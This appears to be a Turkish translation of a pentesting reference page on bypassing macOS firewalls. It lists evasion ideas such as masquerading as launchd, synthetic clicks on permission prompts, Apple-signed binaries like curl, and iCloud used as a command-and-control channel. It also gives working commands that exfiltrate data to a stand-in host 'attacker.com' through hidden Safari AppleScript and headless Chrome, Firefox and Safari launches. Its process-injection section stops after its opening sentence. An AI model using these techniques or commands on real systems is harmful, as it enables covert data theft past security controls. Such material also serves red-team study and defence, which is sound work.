macOS Bypassing Firewalls

Bulunan Teknikler

Aşağıdaki teknikler bazı macOS güvenlik duvarı uygulamalarında çalışır bulunmuştur.

Beyaz liste adlarını kötüye kullanma

• Örneğin, zararlı yazılımı launchd gibi iyi bilinen macOS işlemleri adlarıyla çağırma

Sentetik Tıklama

• Güvenlik duvarı kullanıcıdan izin istediğinde zararlı yazılımın izin ver düğmesine tıklamasını sağlama

Apple imzalı ikilileri Kullanma

• curl gibi, ayrıca whois gibi diğerleri

İyi bilinen apple alan adları

Güvenlik duvarı, apple.com veya icloud.com gibi iyi bilinen apple alan adlarına bağlantılara izin veriyor olabilir. Ve iCloud bir C2 olarak kullanılabilir.

Genel Atlatma

Güvenlik duvarlarını atlatmaya yönelik bazı fikirler

İzin verilen trafiği kontrol etme

İzin verilen trafiği bilmek, potansiyel olarak beyaz listelenmiş alan adlarını veya bunlara erişime izin verilen uygulamaları belirlemenize yardımcı olacaktır

lsof -i TCP -sTCP:ESTABLISHED

DNS Kötüye Kullanımı

DNS çözümlemeleri, muhtemelen DNS sunucularına erişime izin verilecek olan mdnsreponder imzalı uygulama aracılığıyla yapılır.

Tarayıcı Uygulamaları Aracılığıyla

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

İşlem enjeksiyonu aracılığıyla

Eğer bir işleme kod enjekte edebilirseniz ve bu işlem herhangi bir sunucuya bağlanmaya izin veriliyorsa, güvenlik duvarı korumalarını atlayabilirsiniz:

Referanslar

• https://www.youtube.com/watch?v=UlT5KFTMn2k